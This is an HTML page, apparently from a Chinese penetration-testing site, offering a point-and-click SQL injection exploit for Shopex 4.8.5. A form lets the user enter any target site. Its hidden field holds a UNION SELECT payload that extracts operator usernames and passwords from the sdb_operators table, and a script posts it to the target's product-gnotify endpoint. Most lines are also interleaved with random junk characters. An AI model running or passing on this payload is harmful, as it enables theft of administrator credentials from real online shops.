<center>% m( \$ k: Q+ R! W3 H0 T4 R
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
6 a/ S5 w* B! u8 F8 h! P" A) t<form action="" method="post" name="submit_url">
m7 Z% q+ X9 c8 {% f# _# E网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
% w' d N: {+ w: [% X6 t) n2 i<input type="hidden" name="goods[goods_id]" value="3">$ e/ l! x V5 w0 c1 o
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
# h6 `7 @& _$ W<input type="submit" value="给我注入" onclick=fsubmit()>
* G+ r* {9 p% J, q- C; w</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
^% o9 _2 V1 ?* Z% e6 N k8 e; l+ J
<script> ( Y7 u7 j1 G5 `( A O+ X
function fsubmit(){ - M8 {% q4 t0 g$ l# E
form = document.forms[0];
/ p6 V/ h" d. c) ?. X4 {' |) [# { Tform.action = form.url.value+'/?product-gnotify'; 3 S; v5 H9 T- Y; X' l
form.submit();
6 G: v" O. |; |1 l/ u& O q} . t6 y, u+ l, m7 q
</script>/ B% }& a+ R, `) _. q
|